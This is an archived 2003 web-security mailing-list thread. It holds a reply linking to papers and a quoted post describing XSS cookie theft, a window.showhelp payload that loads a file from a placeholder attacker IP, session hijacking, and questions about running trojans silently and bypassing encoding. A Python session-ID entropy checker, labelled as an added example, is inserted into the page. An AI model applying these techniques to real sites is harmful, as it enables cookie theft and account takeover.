WebApp Sec mailing list archives
RE: Proof of Concept Tool on Web Application Security
From: "Gunter" <gunter () technicalinfo net>
Date: Mon, 21 Apr 2003 19:14:33 +0100
There are a number of papers online at www.technicalinfo.net that will help you here and shed a little more light on the situation.

HTML Code Injection and Cross site scripting (http://www.technicalinfo.net/papers/CSS.html)
-- How it works, how to detect, and how to protect against it.

Web Based Session Management (http://www.technicalinfo.net/papers/WebBasedSessionManagement.html)
-- All about session management - understanding the good, the bad, and the ugly.

URL Encoded Attacks (http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html)
-- Understanding how different encoding schema work and alternative representations (incl. bypassing &lt; conversions etc.)

Hope that helps...

-----Original Message-----
From: Indian Tiger [mailto:indiantiger () mailandnews com]
Sent: 18 April 2003 13:55
To: webappsec () securityfocus com
Subject: RE: Proof of Concept Tool on Web Application Security

Hey Everybody,

First of all thank you very much to Robert, Rogan, Steve, Nicolas and Leah for their guidance on testing XSS and session ID brute force attacks. Now I can transfer the victim's cookie to another location successfully. I have tested XSS to transfer the cookie using the following three ways:

1. Using document.location
2. Using Image src
3. Using hidden fields

The cookie which I am getting is of the current application only. Now how can I steal all cookies stored on the victim's machine? Or how to transfer a file from the victim's machine?

Some sites convert < and > tags into &lt; and &gt; to protect themselves from XSS attacks. Is there any way to bypass this protection?

I was testing some trojan execution using XSS. In this process I was able to run the help file 31users.chm from the attacker's machine on the victim's machine as follows:

window.showhelp(file:///XXX.XXX.XXX.XXX/c:/windows/help/31users.chm)

Is it possible to run some trojan or ActiveX component instead of a help file, without alerting with any pop-up? Is it possible to write some malicious help file? (These files do not even ask before execution.)

As per iDEFENSE's article on "Brute forcing Session ID", sometimes the session ID is random. I have tested this against six sites and I was not very lucky in getting session IDs in which only the last 3-4 digits are changing. What do you think, in practice are they still so? Since iDEFENSE published this research in Nov 2001 and the current scenario might be a bit changed.

In my research of six sites, four sites were using the ASP session variable to generate the session ID and the remaining two their own. I was able to hijack ASP sessions using session IDs. In my testing, first I logged in as user1, got his session ID and, using user1's session ID, I was able to hijack user1.

Any help on this would be highly appreciated.

Thanking You.

Sincerely,
Indian Tiger, CISSP
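As an added example (not part of the thread or of the technicalinfo.net papers): a small Python self-assessment for the session-management question above, intended for checking your own application's generator before deployment. It contrasts a constructed counter-style sample, where only the last few digits change as described in the post, with a constructed CSPRNG sample; the 64-bit threshold is an assumed minimum, not a figure from the thread.

```python
import math
import secrets
from collections import Counter

# Constructed sample resembling the weak generators discussed in the thread:
# a fixed prefix plus a counter, so only the last few digits ever change.
WEAK_IDS = [f"ABCD1234567{5000 + i:04d}" for i in range(300)]
# Constructed sample from a CSPRNG: 16 random bytes, hex encoded.
STRONG_IDS = [secrets.token_hex(16) for _ in range(500)]


def per_position_entropy(ids):
    """Shannon entropy (bits) of the character observed at each position."""
    width = min(len(s) for s in ids)
    n = len(ids)
    out = []
    for pos in range(width):
        counts = Counter(s[pos] for s in ids)
        out.append(-sum(c / n * math.log2(c / n) for c in counts.values()))
    return out


def varying_positions(ids):
    """Positions whose character is not identical across the whole sample."""
    width = min(len(s) for s in ids)
    return [p for p in range(width) if len({s[p] for s in ids}) > 1]


def audit(ids, min_bits=64.0):
    """Summarise a sample. The per-position sum is only an upper bound on
    the joint entropy (a counter's digits are correlated), so a low figure
    is conclusive while a high one just rules out trivially weak generators."""
    ent = per_position_entropy(ids)
    varying = varying_positions(ids)
    total = sum(ent)
    return {
        "width": len(ent),
        "varying_positions": len(varying),
        "constant_prefix": varying[0] if varying else len(ent),
        "entropy_bits_upper_bound": round(total, 1),
        "acceptable": total >= min_bits,  # assumed 64-bit minimum
    }


if __name__ == "__main__":
    for name, sample in (("weak", WEAK_IDS), ("strong", STRONG_IDS)):
        print(name, audit(sample))
```

A generator that fails this check should be replaced by an unpredictable source such as the platform's CSPRNG, regardless of how many characters the visible ID has.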
Current thread:
- Proof of Concept Tool on Web Application Security Indian Tiger (Apr 11)
- Re: Proof of Concept Tool on Web Application Security Kriss Andsten (Apr 12)
- <Possible follow-ups>
- RE: Proof of Concept Tool on Web Application Security Indian Tiger (Apr 18)
- RE: Proof of Concept Tool on Web Application Security Gunter (Apr 21)